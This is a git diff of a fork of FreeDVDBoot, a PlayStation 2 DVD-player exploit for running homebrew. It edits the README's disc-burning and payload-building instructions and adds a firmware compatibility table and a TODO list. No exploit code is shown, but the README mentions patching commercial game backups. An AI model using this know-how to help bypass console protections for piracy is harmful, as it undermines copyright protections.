language/VIDEO_TS/VIDEO_TS.IFO b/PAYLOADS/3.03-3.11/udf/VIDEO_TS/VIDEO_TS.IFO similarity index 89% rename from Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VIDEO_TS.IFO rename to PAYLOADS/3.03-3.11/udf/VIDEO_TS/VIDEO_TS.IFO index 20c44ca..8d4fdb1 100644 Binary files a/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VIDEO_TS.IFO and b/PAYLOADS/3.03-3.11/udf/VIDEO_TS/VIDEO_TS.IFO differ diff --git a/Filesystems/3.04M+ - English language/VIDEO_TS/VTS_01_0.IFO b/PAYLOADS/3.03-3.11/udf/VIDEO_TS/VTS_01_0.IFO similarity index 100% rename from Filesystems/3.04M+ - English language/VIDEO_TS/VTS_01_0.IFO rename to PAYLOADS/3.03-3.11/udf/VIDEO_TS/VTS_01_0.IFO diff --git a/Filesystems/3.04M+ - English language/VIDEO_TS/VTS_02_0.IFO b/PAYLOADS/3.03-3.11/udf/VIDEO_TS/VTS_02_0.IFO similarity index 100% rename from Filesystems/3.04M+ - English language/VIDEO_TS/VTS_02_0.IFO rename to PAYLOADS/3.03-3.11/udf/VIDEO_TS/VTS_02_0.IFO diff --git a/PREBUILT ISOs/3.04 only - M+maybe other regions except J - English language.iso b/PREBUILT ISOs/3.04 only - M+maybe other regions except J - English language.iso deleted file mode 100644 index 48afcb9..0000000 Binary files a/PREBUILT ISOs/3.04 only - M+maybe other regions except J - English language.iso and /dev/null differ diff --git a/PREBUILT ISOs/All PS2 Slims - English language.iso b/PREBUILT ISOs/All PS2 Slims - English language.iso deleted file mode 100644 index 0c52ecf..0000000 Binary files a/PREBUILT ISOs/All PS2 Slims - English language.iso and /dev/null differ diff --git a/README.md b/README.md index 35b08f6..4344081 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,8 @@ # FreeDVDBoot -PlayStation 2 DVD Player Exploit. This allows you to burn your own PlayStation 2 homebrew discs and play them on an unmodified console as seen in the [demo video](https://www.youtube.com/watch?v=ez0y-hz3VuM). With uLaunchELF as the initial program, users can include multiple homebrew programs on the same disc. + +This is the fork of the [original repository](https://github.com/CTurt/FreeDVDBoot). + +PlayStation 2 DVD Player Exploit. This allows you to burn your own PlayStation 2 homebrew discs and play them on an unmodified console as seen in the [demo video](https://www.youtube.com/watch?v=ez0y-hz3VuM). With wLaunchELF as the initial program, users can include multiple homebrew programs on the same disc. For technical details please refer to my [blog post](https://cturt.github.io/freedvdboot.html). @@ -8,6 +11,7 @@ Read from [here](#easy-setup-for-all-ps2-slim-consoles--bravia-tv) if you have a Read from [here](#phat-consoles) if you have a Phat PS2. ## Easy setup for all PS2 Slim consoles / Bravia TV + All you need is: - A compatible console (all PS2 Slim / Sony Bravia TV units are supported), @@ -15,34 +19,39 @@ All you need is: - A computer with a built-in disc burner / external USB disc burner, ### Step 1: Download the ISO -Download [`PREBUILT ISOs/All PS2 Slims - English language.iso`](https://github.com/CTurt/FreeDVDBoot/raw/master/PREBUILT%20ISOs/All%20PS2%20Slims%20-%20English%20language.iso) + +Download [`All PS2 Slims - English language.iso`](https://github.com/ps2homebrew/FreeDVDBoot/releases/download/1.0/All.PS2.Slims.-.English.language.iso.zip) ### Step 2: Burn the ISO -Please check following to ensure a good burn which the PS2 will be able to read: + +Please check the following to ensure a good burn which the PS2 will be able to read: - Clean off any dust from the disc, -- Select lowest burning speed option, -- Select finalise disc option, +- Select the lowest burning speed option, +- Select finalize disc option, ### Step 3: Set console language to English + Your console must be set to **English language** for the exploit to work (other languages cause memory contents to change). To do this, boot without a disc inserted, press **Circle** to enter **System Configuration** and set your system language to **English**. ### Step 4: Boot! -Insert the disc into your console, and wait. It should boot into **uLaunchELF** within a few seconds. -From **uLaunchELF**, you have the ability to run any homebrew you want over USB **mass** storage! Many people choose to run **FreeMCBoot** or **Fortuna** installer, as they find booting from a memory card more convenient. +Insert the disc into your console, and wait. It should boot into **wLaunchELF** within a few seconds. -If you want to add additional homebrew to your DVD / replace uLaunchELF, please read from [Custom disc setup](#custom-disc-setup). +From **wLaunchELF**, you can run any homebrew you want over USB **mass** storage! Many people choose to run **FreeMCBoot** or **Fortuna** installer, as they find booting from a memory card more convenient. + +If you want to add additional homebrew to your DVD / replace wLaunchELF, please read from [Custom disc setup](#custom-disc-setup). ## Troubleshooting - please read if the above didn't work -| Problem | Solution | + +| Problem | Solution | |------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | Disc doesn't spin on slim console | Press the lid down hard to ensure the sensors detect that the lid is closed. If still not working try placing some weight such as a book on the top of the console. | -| PS2 detects the disc as "PlayStation 2 disc" instead of "DVD Video" in the browser | Your PS2 has a modchip which is incorrectly preventing the DVD player from launching. You do not need this exploit for a console with a modchip, but if you really want to try it some modchips offer the ability to temporarily disable themselves (by holding start when booting for example). | -| PS2 displays "unable to read disc" | Please try playing a real DVD movie disc to verify that your console's DVD laser works; doing this can also recalibrate the laser which might solve the issue, as [commented here](https://github.com/CTurt/FreeDVDBoot/issues/27). Also try the following PS2 setting `Version -> Console -> Diagnosis -> On` which can assist with laser problems. | -| PS2 freezes at black/red/green screen | If your PS2 DVD laser is really worn out, or you are using something difficult to read like a dusty DVD+RW burned on high speed, it might take some time before uLaunchELF actually starts. Please try waiting 3 minutes or so, per [this comment](https://github.com/CTurt/FreeDVDBoot/issues/3#issuecomment-651337741) | +| PS2 detects the disc as "PlayStation 2 disc" instead of "DVD Video" in the browser | Your PS2 has a modchip that is incorrectly preventing the DVD player from launching. You do not need this exploit for a console with a modchip, but if you really want to try it some modchips offer the ability to temporarily disable themselves (by holding start when booting, for example). | +| PS2 displays "unable to read disc" | Please try playing a real DVD movie disc to verify that your console's DVD laser works; doing this can also recalibrate the laser that might solve the issue, as [commented here](https://github.com/CTurt/FreeDVDBoot/issues/27). Also try the following PS2 setting `Version -> Console -> Diagnosis -> On` which can assist with laser problems. | +| PS2 freezes at black/red/green screen | If your PS2 DVD laser is really worn out, or you are using something difficult to read as a dusty DVD+RW burned on high speed, it might take some time before wLaunchELF actually starts. Please try waiting 3 minutes or so, per [this comment](https://github.com/CTurt/FreeDVDBoot/issues/3#issuecomment-651337741) | Other suggestions that worked for others: @@ -59,11 +68,13 @@ Other suggestions that worked for others: **Please, only open a GitHub issue if you have read and tried all of the above. If you do open an issue, please confirm that you tried a real DVD movie and it worked on your system so that we know it's not just a laser failure; also include your DVD player version, the name of the ISO you tried, the type of DVD, and what happens when you launch the disc.** ## Phat consoles -Phat consoles have many different firmware version revisions, which makes them harder to add support for. It also means you will need to identify your firmware version, and burn the matching ISO file. -It's still early in terms of support for different versions, check back here later. Hopefully over time other developers from the scene will also contribute support for additional DVD Player versions. The new exploit for 2.10 should be possible to port to all firmwares between 1.00 - 2.13 (Sony actually patched this one in 2.14 lol). +Phat consoles have many different firmware version revisions, which makes them harder to add support for. It also means you will need to identify your firmware version and burn the matching ISO file. + +It's still early in terms of support for different versions, check back here later. Hopefully, over time other developers from the scene will also contribute support for additional DVD Player versions. The new exploit for 2.10 should be possible to port to all firmware revisions between 1.10 - 2.13 (Sony actually patched this one in 2.14 lol). ### Step 1: Identify your DVD Player Version + Boot your PlayStation 2 without any disc inserted, and press Triangle to identify which DVD Player version your console has. **Currently only support:** @@ -72,9 +83,10 @@ Boot your PlayStation 2 without any disc inserted, and press Triangle to identif - 2.12 (regions U, J, and G, if any other regions exist for 2.12 let me know), -- 3.04 (tested only region M in emulator so far, but guess most other regions EUMACDG, except for J will work - with English language set in settings), +- 3.04 (tested only region M in the emulator so far, but guess most other regions EUMACDG, except for J will work - with English language set in settings), ### Step 2: Download the ISO + Download the ISO that corresponds to your firmware version. **Please don't bother trying on a non-supported firmware/language configuration, it won't work...** @@ -82,64 +94,75 @@ Download the ISO that corresponds to your firmware version. For example, if your DVD Player version is 2.10J, you would want to download `PREBUILT ISOs/2.10.iso`. ### Step 3, 4, 5 - Burn the ISO, set console language to English, and boot! + These steps are the same as described for slim above. ## Custom disc setup - Slim -If you intend to make your own image containing additional homebrew / modified initial loader, please read on. + +If you intend to make your image containing additional homebrew / modified initial loader, please read on. ### Step 1: Copy your homebrew + Once you've identified your console's DVD Player version, copy all of the homebrew you would like to include on the disc into that directory in the `Filesystems` (EG: `Filesystems/All PS2 slims (3.10 + 3.11) - English language/` is the one that supports all slim consoles). ### Step 2: Make an image + Once you've placed all the homebrew files you'd like into the directory, generate a UDF (ISO9960/UDF hybrid also works) image of the directory (so `VIDEO_TS` is in the root). -On Windows, you can use a GUI like ImgBurn to make an disc image. It will give a warning that `VIDEO_TS.BUP` is missing, but just click continue anyway (PS2 doesn't require this file). +On Windows, you can use a GUI like ImgBurn to make a disc image. It will give a warning that `VIDEO_TS.BUP` is missing, but just click continue anyway (PS2 doesn't require this file). -On Linux the easiest way is probably to use `genisoimage` as it comes pre-installed on many Linux distributions like Ubuntu. Run the following on terminal (where `exploit.iso` is the output and `Filesystem/All PS2 slims (3.10 + 3.11) - English language` is the directory containing `VIDEO_TS` and any homebrew): +On Linux, the easiest way is probably to use `genisoimage` as it comes pre-installed on many Linux distributions like Ubuntu. Run the following on terminal (where `exploit.iso` is the output and `Filesystem/All PS2 slims (3.10 + 3.11) - English language` is the directory containing `VIDEO_TS` and any homebrew): genisoimage -udf -o exploit.iso "Filesystems/All PS2 slims (3.10 + 3.11) - English language" ### Step 3: Test and burn -I would recommend you test in PCSX2 first, but since [PCSX2 doesn't support loading the DVD Player](https://github.com/PCSX2/pcsx2/issues/1981), you have to decrypt and repack it yourself, which is beyond the scope of this README. With that said, if you aren't touching anything in `VIDEO_TS`, there shouldn't really be any reason for the exploit to fail. + +I would recommend you test in PCSX2 first, but since [PCSX2 doesn't support loading the DVD Player](https://github.com/PCSX2/pcsx2/issues/1981), you have to decrypt and repack it yourself, which is beyond the scope of this README. With that said, if you aren't touching anything in `VIDEO_TS`, there shouldn't be any reason for the exploit to fail. ## Custom disc setup - Phat -Instructions for building the phat exploit coming soon. + +Instructions for building the phat exploit will be coming soon. ## Replacing the initial program - Slim -I've included uLaunchELF recompiled with [DVD support](https://github.com/ps2dev/ps2sdk/pull/130) as the default initial program. It presents a menu which allows you to select any of the homebrew programs you chose to include on the disc (and also allows booting from USB). -Alternatively, if you would rather just boot into a single homebrew application, the initial program the exploit attempts to boot is located at `VIDEO_TS/VTS_02_0.IFO`, replace it with your desired `ELF` file, with the below caveat that compatibility might be lower than if you booted a program through uLaunchELF: +I've included wLaunchELF recompiled with [DVD support](https://github.com/ps2dev/ps2sdk/pull/130) as the default initial program. It presents a menu that allows you to select any of the homebrew programs you chose to include on the disc (and also allows booting from USB). + +Alternatively, if you would rather just boot into a single homebrew application, the initial program the exploit attempts to boot is located at `VIDEO_TS/VTS_02_0.IFO`, replace it with your desired `ELF` file, with the below caveat that compatibility might be lower than if you booted a program through wLaunchELF: For the initial release, I didn't bother to reimplement a couple of functions used by the loader, so it requires that the ELF you load doesn't overwrite those functions I use (those are around `0x84000 - 0x85fff` and `0x250000 - 0x29ffff`). I will probably remove this limitation in the future, but all ELFs I could find were fine with this limitation. You can run `readelf -l` to verify your executable satisfies this requirement. For example, this Tetris homebrew just uses `0x00100000 - 0x0017a940`: - $ readelf -l VTS_02_0.IFO + $ readelf -l VTS_02_0.IFO - Elf file type is EXEC (Executable file) - Entry point 0x104490 - There is 1 program header, starting at offset 52 + Elf file type is EXEC (Executable file) + Entry point 0x104490 + There is 1 program header, starting at offset 52 - Program Headers: - Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align - LOAD 0x001000 0x00100000 0x00100000 0x72ef4 0x7a940 RWE 0x1000 + Program Headers: + Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align + LOAD 0x001000 0x00100000 0x00100000 0x72ef4 0x7a940 RWE 0x1000 - Section to Segment mapping: - Segment Sections... - 00 .text .ctors .dtors .rodata .data .jcr .sdata .sbss .bss + Section to Segment mapping: + Segment Sections... + 00 .text .ctors .dtors .rodata .data .jcr .sdata .sbss .bss ## Replacing the initial program - Phat + The ELF is read from `0x5bb000` in the ISO file, copy to that location with a hex editor to replace it. ## Loading backups + It's possible to patch backup images of commercial games to make them bootable using this exploit. I didn't want to maintain this tool, so it's not included in this repository, but can be found by searching for something like FreeDVDBoot ESR auto patcher. ## DEVELOPMENT: Replacing the loader payload - Slim -The default payload will boot `VIDEO_TS/VTS_02_0.IFO` as an ELF file, but tweaks might be desired to improve compatibility, or maybe changing the behaviour to boot `BOOT.ELF` instead for instance. + +The default payload will boot `VIDEO_TS/VTS_02_0.IFO` as an ELF file, but tweaks might be desired to improve compatibility, or maybe changing the behavior to boot `BOOT.ELF` instead for instance. If you wish to update the loader payload, run `build.sh` inside `PAYLOAD` directory, and copy the output `.bin` files into `VIDEO_TS/VIDEO_TS.IFO` at the offsets displayed by the output of the command. ## DEVELOPMENT: Replacing the loader payload - Phat + Run the following to build a new `dvd.iso`: `make -f hardware.mk` @@ -151,4 +174,47 @@ If you want to test on PCSX2 using KrHacken's repacked DVD players, it loads `ud `clean` before switching between these different Makefiles, or use `-B` flag. ## PORTING: -Please read my technical writeup, to understand how the exploit works. I've also provided some [notes about porting](https://cturt.github.io/FreeDVDBoot/portingnotes.html) in the [`gh-pages`](https://github.com/CTurt/FreeDVDBoot/tree/gh-pages) branch. + +Please read my technical writeup, to understand how the exploit works. I've also provided some [notes about porting](https://ps2homebrew.github.io/FreeDVDBoot/portingnotes.html) in the [`gh-pages`](https://github.com/ps2homebrew/FreeDVDBoot/tree/gh-pages) branch. + +## Reference table + +| DVDver | PS2 Model | Hackable | +|----------|:-------------:|------:| +| 1.10U | SCPH-30001 | t | +| 1.20A | SCPH-30002 | ? | +| 1.20E | SCPH-30003/4 | ? | +| 1.20U | SCPH-30001 | ? | +| 1.30A | SCPH-30002/35002 | ? | +| 1.30E | SCPH-30003/4/35003/4 | ? | +| 1.30U | SCPH-30001/35001 | ? | +| 2.00J | SCPH-18000 | ? | +| 2.02J | SCPH-30000/35000 | ? | +| 2.10A | SCPH-30002 R | E | +| 2.10E | SCPH-30003/4 R | E | +| 2.10J | SCPH-30000 | E | +| 2.10U | SCPH-30001 R | E | +| 2.12G | SCPH-30006 R | E | +| 2.12U | SCPH-39001 | E | +| 2.13A | SCPH-39002 | t | +| 2.13E | SCPH-39003/4 | t | +| 2.14J | SCPH-37000 | x | +| 2.15G | SCPH-39006 | x | +| 2.16D | SCPH-39008 | x | +| 2.16J | SCPH-39000 | x | +| 3.00A | SCPH-50002 | x | +| 3.00E | SCPH-50003/4 | x | +| 3.00J | SCPH-5x000 | x | +| 3.00U | SCPH-50001 | x | +| 3.02A | SCPH-50002 | x | +| 3.02C | SCPH-50009 | x | +| 3.02D | SCPH-50008 | x | +| 3.02E | SCPH-50003/4 | x | +| 3.02G | SCPH-50005/6 | x | +| 3.02J | SCPH-50000 | x | +| 3.02U | SCPH-50001 | x | +| 3.03E | SCPH-50004 | C | +| 3.03J | SCPH-50000 | C | +| 3.04M | SCPH-50011 | C | +| 3.10 | SCPH-700xx | C | +| 3.11 | SCPH-750xx/770xx/790xx/900xx/PX300 | C | diff --git a/TODO b/TODO new file mode 100644 index 0000000..0d7e4ee --- /dev/null +++ b/TODO @@ -0,0 +1,6 @@ +Test payload in pcsx2 with the real DVDROM content, not with repacked dvd-player versions +port 1.00-2.13 payload to all DVD FW in that range +try to generate an iso with the mix of 2 payloads +document more how ElReino payload is working +fix compilation warnings +test if generated iso files works